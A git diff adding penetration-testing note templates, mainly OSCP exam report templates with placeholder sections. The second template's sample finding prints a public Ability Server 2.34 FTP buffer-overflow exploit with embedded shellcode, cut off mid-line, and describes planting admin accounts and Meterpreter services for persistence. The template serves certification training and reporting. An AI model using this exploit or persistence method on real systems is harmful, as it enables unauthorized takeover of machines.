diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Passwords/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Passwords/General Notes.md
new file mode 100644
index 0000000..994fc21
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Passwords/General Notes.md
@@ -0,0 +1 @@
+# Any passwords or hashs that you find should be documented here. Include steps on how you were able to obtain them from your target:
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Proof_Screenshots/Target _1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Proof_Screenshots/Target _1.md
new file mode 100644
index 0000000..56b7267
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Proof_Screenshots/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your targets here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V1.md
new file mode 100644
index 0000000..72e8372
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V1.md
@@ -0,0 +1,365 @@
+
+#
Offensive Security Lab/Exam Penetration Test Report
+ +![d2550626a1c94aeebd273d43be0669c9.png](../../../_resources/d2550626a1c94aeebd273d43be0669c9.png) + +##
student@emailaddress.com Student-ID
+ +######
2020-XX-XX
+ + +
+ +## Contents + +- 1 Offensive Security Exam Penetration Test Report + - 1.1 Introduction + - 1.2 Objective + - 1.3 Requirements +- 2 High-Level Summary + - 2.1 Recommendations +- 3 Methodologies + - 3.1 Information Gathering + - 3.2 Penetration + - 3.2.1 System IP: 192.168.x.x + - 3.2.1.1 Service Enumeration + - 3.2.1.2 Privilege Escalation + - 3.2.2 System IP: 192.168.x.x + - 3.2.2.1 Service Enumeration + - 3.2.2.2 Privilege Escalation + - 3.2.3 System IP: 192.168.x.x + - 3.2.3.1 Service Enumeration + - 3.2.3.2 Privilege Escalation + - 3.2.4 System IP: 192.168.x.x + - 3.2.4.1 Service Enumeration + - 3.2.4.2 Privilege Escalation + - 3.2.5 System IP: 192.168.x.x + - 3.3 Maintaining Access + - 3.4 House Cleaning +- 4 Additional Items + - 4.1 Appendix - Proof and Local Contents: + - 4.2 Appendix - Metasploit/Meterpreter Usage + +
+ +## Introduction + +The Offensive Security Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security exam. +This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. +The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional. + +## Objective + +The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab/Exam network. +The student is tasked with following methodical approach in obtaining access to the objective goals. +This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. +An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. +Use the sample report as a guideline to get you through the reporting. + +## Requirements + +The student will be required to fill out this penetration testing report fully and to include the following sections: + +- Overall High-Level Summary and Recommendations (non-technical) +- Methodology walkthrough and detailed outline of steps taken +- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable +- Any additional items that were not included + +
+
+# High-Level Summary
+
+I was tasked with performing an internal penetration test towards Offensive Security Exam.
+An internal penetration test is a dedicated attack against internally connected systems.
+The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal exam systems – the THINC.local domain.
+My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
+
+When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network.
+When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.
+During the testing, I had administrative level access to multiple systems.
+All systems were successfully exploited and access granted.
+These systems as well as a brief description on how access was obtained are listed below:
+
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - BOF
+
+## Recommendations
+
+I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future.
+One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
+
+
+# Methodologies
+
+I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Exam environments is secured.
+Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
+
+## Information Gathering
+
+The information gathering portion of a penetration test focuses on identifying the scope of the penetration test.
+During this penetration test, I was tasked with exploiting the exam network.
+The specific IP addresses were:
+
+**Exam Network**
+
+- 192.168.
+- 192.168.
+- 192.168.
+- 192.168.
+- 192.168.
+
+## Penetration
+
+The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
+During this penetration test, I was able to successfully gain access to **X** out of the **X** systems.
+
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems.
+This is valuable for an attacker as it provides detailed information on potential attack vectors into a system.
+Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.
+In some cases, some ports may not be listed.
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+
+### System IP: 192.168.x.x
+
+**Vulnerability Exploited: **
+
+**Proof Screenshot:**
+
+
+## Maintaining Access
+
+Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable.
+The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again.
+Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
+
+## House Cleaning
+
+The house cleaning portions of the assessment ensures that remnants of the penetration test are removed.
+Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.
+Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
+
+After collecting trophies from the exam network was completed, Alec removed all user accounts and passwords as well as the Meterpreter services installed on the system.
+Offensive Security should not have to remove any user accounts or services from the system.
+
+
+
+# Additional Items
+
+## Appendix - Proof and Local Contents:
+
+IP (Hostname) | Local.txt Contents | Proof.txt Contents
+--------------|--------------------|-------------------
+192.168.x.x | hash_here | hash_here
+192.168.x.x | hash_here | hash_here
+192.168.x.x | hash_here | hash_here
+192.168.x.x | hash_here | hash_here
+192.168.x.x | hash_here | hash_here
+
+## Appendix - Metasploit/Meterpreter Usage
+
+For the exam, I used my Metasploit/Meterpreter allowance on the following machine: `192.168.x.x`
+
+
+ +
+ +![310x310.png](../../../_resources/310x310.png) + +
+ + diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V2.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V2.md new file mode 100644 index 0000000..5c7c7c9 --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V2.md @@ -0,0 +1,459 @@ +#
Offensive Security Lab/Exam Penetration Test Report
+ +![d2550626a1c94aeebd273d43be0669c9.png](../../../_resources/d2550626a1c94aeebd273d43be0669c9.png) + +##
student@emailaddress.com Student-ID
+ +######
2023-XX-XX
+ + +
+
+
+# Offensive Security OSCP Exam Report
+
+## Introduction
+
+The Offensive Security Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security course.
+This report should contain all items that were used to pass the overall exam and it will be graded from a standpoint of correctness and fullness to all aspects of the exam.
+The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.
+
+## Objective
+
+The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab and Exam network.
+The student is tasked with following methodical approach in obtaining access to the objective goals.
+This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.
+An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course.
+Use the sample report as a guideline to get you through the reporting.
+
+## Requirements
+
+The student will be required to fill out this penetration testing report fully and to include the following sections:
+
+- Overall High-Level Summary and Recommendations (non-technical)
+- Methodology walkthrough and detailed outline of steps taken
+- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
+- Any additional items that were not included
+
+# High-Level Summary
+
+Alfred Simmons was tasked with performing an internal penetration test towards Offensive Security Labs.
+An internal penetration test is a dedicated attack against internally connected systems.
+The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security's internal lab systems - the THINC.local domain.
+Alfred's overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
+
+When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security's network.
+When performing the attacks, Alfred was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.
+During the testing, Alfred had administrative level access to multiple systems.
+All systems were successfully exploited and access granted.
+These systems as well as a brief description on how access was obtained are listed below:
+
+- Active Directory Set:
+ - HOSTNAME - Name of initial exploit
+ - HOSTNAME - Name of initial exploit
+ - HOSTNAME - Name of initial exploit
+- Standalone 1 - HOSTNAME - Name of initial exploit
+- Standalone 2 - HOSTNAME - Name of initial exploit
+- Standalone 3 - HOSTNAME - Name of initial exploit
+
+## Sample Report - Recommendations
+
+Alfred recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future.
+One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
+
+# Sample Report - Methodologies
+
+Alfred utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure.
+Below is a breakout of how Alfred was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
+
+## Sample Report - Information Gathering
+
+The information gathering portion of a penetration test focuses on identifying the scope of the penetration test.
+During this penetration test, Alfred was tasked with exploiting the lab and exam network.
+The specific IP addresses were:
+
+**Exam Network**
+
+172.16.203.133, 172.16.203.134, 172.16.203.135, 172.16.203.136
+
+## Sample Report - Service Enumeration
+
+The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems.
+This is valuable for an attacker as it provides detailed information on potential attack vectors into a system.
+Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.
+In some cases, some ports may not be listed.
+
+## Sample Report - Penetration
+
+The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
+During this penetration test, Alfred was able to successfully gain access to **X** out of the **X** systems.
+
+## Sample Report - Maintaining Access
+
+Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable.
+The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again.
+Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
+
+Alfred added administrator and root level accounts on all systems compromised.
+In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.
+
+## Sample Report - House Cleaning
+
+The house cleaning portions of the assessment ensures that remnants of the penetration test are removed.
+Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road.
+Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
+
+After the trophies on the exam network were completed, Alfred removed all user accounts and passwords as well as the meterpreter services installed on the system.
+Offensive Security should not have to remove any user accounts or services from the system.
+
+# Independent Challenges
+
+## Target #1 - 192.168.x.x
+
+### Service Enumeration
+
+**Port Scan Results**
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.1.1 | **TCP**: 21,22,25,80,443
+
+**FTP Enumeration**
+
+_Upon manual enumeration of the available FTP service, Alfred noticed it was running an outdated version 2.3.4 that is prone to the remote buffer overflow vulnerability._
+
+### Initial Access - Buffer Overflow
+
+**Vulnerability Explanation:** Ability Server 2.34 is subject to a buffer overflow vulnerability in STOR field.
+Attackers can use this vulnerability to cause arbitrary remote code execution and take completely control over the system.
+
+**Vulnerability Fix:** The publishers of the Ability Server have issued a patch to fix this known issue.
+It can be found here: http://www.code-crafters.com/abilityserver/
+
+**Severity:** Critical
+
+**Steps to reproduce the attack:** The operating system was different from the known public exploit.
+A rewritten exploit was needed in order for successful code execution to occur. Once the exploit was rewritten, a targeted attack was performed on the system which gave Alfredfull administrative access over the system.
+
+**Proof of Concept Code Here:** Modifications to the existing exploit was needed and is highlighted in red.
+ +```python +################################### +# Ability Server 2.34 FTP STOR Buffer Overflow +# Advanced, secure and easy to use FTP Server. +# 21 Oct 2004 - muts +################################### +# D:\BO>ability-2.34-ftp-stor.py +################################### +# D:\data\tools>nc -v 127.0.0.1 4444 +# localhost [127.0.0.1] 4444 (?) open +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. +# D:\Program Files\abilitywebserver> +################################### + +import ftplib +from ftplib import FTP +import struct +print "\n\n################################" +print "\nAbility Server 2.34 FTP STOR buffer Overflow" +print "\nFor Educational Purposes Only!\n" +print "###################################" + +# Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial" + +sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" +sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6" +sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba" +sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" +sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" +sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61" +sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70" +sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44" +sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" +sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69" +sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" +sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" +sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" +sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7" +sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0" +sc += 
"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67" +sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" +sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0" +sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" +sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d" +sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95" +sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2" +# Change RET address if need be. +buffer = '\x41'*966+struct.pack('